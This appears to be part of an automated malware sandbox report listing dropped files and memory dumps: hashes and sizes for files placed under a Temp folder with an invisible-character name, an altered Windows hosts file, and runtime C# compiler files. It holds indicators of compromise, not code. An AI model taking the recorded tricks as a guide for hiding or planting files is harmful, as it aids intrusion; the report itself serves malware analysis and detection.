41c6f412b9464444c6e12f6bb512c433307f244ed7f5f89e1fd37de9c57c5c0e

SHA512
8b09280e7b663be34a1678a66c3d2f5b28268e7f91b60976c836339710037418a55a96c30e59a76581efb8f773a300390d0459deb1486e9fff08d0a0702ce52a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\PopOpen.xlsx

Filesize
630KB

MD5
68a9215d61f962d4abdac4a8d68f1d5b

SHA1
d6bff7015a83de3cab49abd66ca421cf0eb9a5d5

SHA256
c70019b975c45acccf1d3231f6cd9c376ea69eafa0668570a17ac15b03310835

SHA512
d736a14245a9e848f1b8ebdd03a4f7785e826a2903b14a03d7432b6311a285bc45e6950a6d2e44aea6fbe92192db103ea706d1a5b7f65a641b0fd77915fb6e9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\RemoveEnable.xlsx

Filesize
11KB

MD5
6c63f082e3245be5ffefe48de33ae80d

SHA1
aa6fbf6fc9705b8d0ff1a91875032d0ce19854b0

SHA256
e83a076bc25d520df7637c0a6daa44b7147705b1390481bb19cb6ec31a500fb8

SHA512
ed22ff63690dcfbefbd4844de3b4bec36c7eaf8b6eae576f74549275b271fadb9aa30fd2fa8008aa12da3b7639bfab9dabc610f77d200bfe576346a9b2bec470

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\SplitResume.csv

Filesize
861KB

MD5
bf25dff2494731a127b3e99436d320d2

SHA1
c008fe08173b5ca782775f3a109f94736a7ac118

SHA256
8e01b2dd4a129ef8c6f113b4baf37d128385af23a827d00765699f632fe35fac

SHA512
d47ab3c400b23e53862b9ce579f5e2571f488b98b82ef53a1a33b472bbc2afbb106693a721df222b5b8064da1f7f456f6077e2fe34f6b70bb497e0a1e49ff040

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\SuspendRead.docx

Filesize
1.3MB

MD5
befac3e3f08d9dfd20c51527b42221fa

SHA1
32fee0738f4f56c3b44cfbe6e48edb9032b234ff

SHA256
05c7b539566b4f8a44b78b0653ce980baea634f5245b25179fa4a4ab2a3435e3

SHA512
de81e13d55ca26b6862bd297041bbaeb1b4d0bbb9830837a10018db9a6c6990ac5bc20636b10e1d7b52aa237ed0ea58020dab6eecbc298c0e373808420eab40e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\SwitchExport.xlsx

Filesize
12KB

MD5
48ec611fc3151d533760f836cace5621

SHA1
4e878b659f095151876a3f3e21789721f63507f8

SHA256
c797ae5685df4f4b41d8d250e8e169cea488fbcc664ded19a90b6da5e3e60318

SHA512
af6955508fe2904bccafb447facfde36ee2adbdbd096a8a0e6e6208407cfb909455bbdd8efa04a6501fe08ae0f615118275005ccaa7fa5a2f7b8b1aaf9520e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\UnblockSubmit.xlsx

Filesize
14KB

MD5
ec732b7417a3b2a29d54d2214ec82c5b

SHA1
40cc6ac9e43a6530213b8e814a2468e39f71d72c

SHA256
d342ffc8944ec4323cce3601eb4a1b478632d0613a2217b02bd22f490f7f46b8

SHA512
53acba4a954e7e41de1f67734ed0714b9bb1cd83a8fee303b1f26edcdcc8663ac4b364dc011ba7c6b1ddf17c33a97e067ec41eaaa3f26e955b32d81f25c9b584

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Documents\UnprotectWatch.txt

Filesize
441KB

MD5
ba6c5d23c68d3752cab76fab4ae1b4b6

SHA1
41ac79d35386bac5ffde2f8cc242c9553deb5fcf

SHA256
d031e5e7a1fd8447b404b32f62a9fc1e5dd4c1621207c456598fcf5729852803

SHA512
d563cd9435b4c13c7d4afc9f4bfeffebff0283bb93bf6db6e801bfba719e41b79fab132e642d1b9986d56b5ada7879d1fb872971c8ff3bd22bb34cf36c2ff159

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Downloads\GrantPublish.png

Filesize
561KB

MD5
5293c4ec3fa5410b12ac097eebad9725

SHA1
2044825c325b5ce3ac51020acbdb88e04d5bfdd0

SHA256
2aa9a653dbea5bb57d62e0a4d53bcef51186f21a9a6baa16e71c7c1984f2178b

SHA512
6c8b7956ba6b8f99225e2dde76623f351d925652b8469e441f51db2a18247234611dc1b46b59bde768fb9a1142cc91551fbe653656439a15f6290a72ef4a7ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‍‎‏\Common Files\Downloads\RemoveGroup.jpeg

Filesize
676KB

MD5
b055c6e3751e84336268ffaa5891f9b8

SHA1
0a94160baed43589c1bbd844415150a1ae8185bb

SHA256
f1b16d1ac02f140a0cffb76d48b8bea675159bf2d11896acc2607bb3dbc21d91

SHA512
4a699c85ceafa0b1d0f0d1cc8301b4dbae34c3fe8d897ee71b72cbf7a4aab5aa511a6f08d68387bfe73cfebbf17646377e6ee46bbe8119b4e8f2bbd8fe2b60d5

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\txzfklbx\CSC876D2F6DF114C1A9385C6627E646430.TMP

Filesize
652B

MD5
a54357abd6e92ba7a57a58fdc01addea

SHA1
376d5608504b7bf7bab0f5bb4dddeb4224f777c8

SHA256
368cb84aff0828c8c9e165e380b1b128cb490082d745f1b810d8b86c15772b44

SHA512
ae90a6a688455b913f0f9514d3daabc51b6b5529ac5c4d3fb336efa83d25eaf97f5ffd194731b804beba518dd091e820a8771657779e7b0f3a4d6bd0575d14dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\txzfklbx\txzfklbx.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\txzfklbx\txzfklbx.cmdline

Filesize
607B

MD5
53aab71899f4090abc3d46fd4b93d1de

SHA1
ac7e55fef5b16241f43ce7c11238a1e30f106f5f

SHA256
3fb85b171827b9dc23659fbc5395b3f3be497f5eea125e9ad59de5998a684995

SHA512
00c1fe74cf2f85a7b8a0d49af43af334f7b8c3c865abede685d11263ce4369a4a33ee73ec34f57368efa8e3ea533330e0921de5fc0fcfe16951a580591514a8e

Download Submit
memory/460-244-0x000001D2E9CD0000-0x000001D2E9E1F000-memory.dmp

Filesize
1.3MB

Download
memory/460-98-0x000001D2E9CA0000-0x000001D2E9CC2000-memory.dmp

Filesize
136KB

Download
memory/752-67-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp

Filesize
6.4MB

Download
memory/752-349-0x00007FFFECD60000-0x00007FFFECD6D000-memory.dmp

Filesize
52KB

Download
memory/752-48-0x00007FFFF23A0000-0x00007FFFF23AF000-memory.dmp

Filesize
60KB

Download
memory/752-71-0x00007FFFE88E0000-0x00007FFFE89AE000-memory.dmp

Filesize
824KB

Download
memory/752-348-0x00007FFFECD70000-0x00007FFFECD84000-memory.dmp

Filesize
80KB

Download
memory/752-25-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp

Filesize
6.4MB

Download
memory/752-68-0x00007FFFEC8F0000-0x00007FFFEC923000-memory.dmp

Filesize
204KB

Download
memory/752-278-0x00007FFFEC8F0000-0x00007FFFEC923000-memory.dmp

Filesize
204KB

Download
memory/752-56-0x00007FFFEF9C0000-0x00007FFFEF9D9000-memory.dmp

Filesize
100KB

Download
memory/752-220-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp

Filesize
1.5MB

Download
memory/752-60-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp

Filesize
1.5MB

Download
memory/752-350-0x00007FFFE8820000-0x00007FFFE88D3000-memory.dmp

Filesize
716KB

Download
memory/752-191-0x00007FFFECD90000-0x00007FFFECDB5000-memory.dmp

Filesize
148KB

Download
memory/752-347-0x00007FFFE88E0000-0x00007FFFE89AE000-memory.dmp

Filesize
824KB

Download
memory/752-58-0x00007FFFECD90000-0x00007FFFECDB5000-memory.dmp

Filesize
148KB

Download
memory/752-80-0x00007FFFE8820000-0x00007FFFE88D3000-memory.dmp

Filesize
716KB

Download
memory/752-75-0x00007FFFECD60000-0x00007FFFECD6D000-memory.dmp

Filesize
52KB

Download
memory/752-62-0x00007FFFEEFA0000-0x00007FFFEEFB9000-memory.dmp

Filesize
100KB

Download
memory/752-290-0x00007FFFD94C0000-0x00007FFFD99F3000-memory.dmp

Filesize
5.2MB

Download
memory/752-64-0x00007FFFECE00000-0x00007FFFECE0D000-memory.dmp

Filesize
52KB

Download
memory/752-54-0x00007FFFECE10000-0x00007FFFECE3B000-memory.dmp

Filesize
172KB

Download
memory/752-69-0x00007FFFD94C0000-0x00007FFFD99F3000-memory.dmp

Filesize
5.2MB

Download
memory/752-47-0x00007FFFEE0A0000-0x00007FFFEE0C7000-memory.dmp

Filesize
156KB

Download
memory/752-351-0x00007FFFD94C0000-0x00007FFFD99F3000-memory.dmp

Filesize
5.2MB

Download
memory/752-73-0x00007FFFECD70000-0x00007FFFECD84000-memory.dmp

Filesize
80KB

Download
memory/752-297-0x00007FFFE88E0000-0x00007FFFE89AE000-memory.dmp

Filesize
824KB

Download
memory/752-299-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp

Filesize
6.4MB

Download
memory/752-305-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp

Filesize
1.5MB

Download
memory/752-352-0x00007FFFEE0A0000-0x00007FFFEE0C7000-memory.dmp

Filesize
156KB

Download
memory/752-353-0x00007FFFF23A0000-0x00007FFFF23AF000-memory.dmp

Filesize
60KB

Download
memory/752-336-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp

Filesize
6.4MB

Download
memory/752-359-0x00007FFFECE00000-0x00007FFFECE0D000-memory.dmp

Filesize
52KB

Download
memory/752-360-0x00007FFFEC8F0000-0x00007FFFEC923000-memory.dmp

Filesize
204KB

Download
memory/752-358-0x00007FFFEEFA0000-0x00007FFFEEFB9000-memory.dmp

Filesize
100KB

Download
memory/752-357-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp

Filesize
1.5MB

Download
memory/752-356-0x00007FFFECD90000-0x00007FFFECDB5000-memory.dmp

Filesize
148KB

Download
memory/752-355-0x00007FFFEF9C0000-0x00007FFFEF9D9000-memory.dmp

Filesize
100KB

Download
memory/752-354-0x00007FFFECE10000-0x00007FFFECE3B000-memory.dmp

Filesize
172KB

Download
memory/1200-324-0x00000141C8530000-0x00000141C867F000-memory.dmp

Filesize
1.3MB

Download
memory/1344-335-0x00000215DC2D0000-0x00000215DC41F000-memory.dmp

Filesize
1.3MB

Download
memory/1840-248-0x000002636AD00000-0x000002636AE4F000-memory.dmp

Filesize
1.3MB

Download
memory/1864-245-0x000001D6FC1F0000-0x000001D6FC33F000-memory.dmp

Filesize
1.3MB

Download
memory/2504-239-0x000001A47C0E0000-0x000001A47C22F000-memory.dmp

Filesize
1.3MB

Download
memory/2504-228-0x000001A47BBE0000-0x000001A47BBE8000-memory.dmp

Filesize
32KB

Download
memory/2712-213-0x000001FFE8BD0000-0x000001FFE8D1F000-memory.dmp

Filesize
1.3MB

Download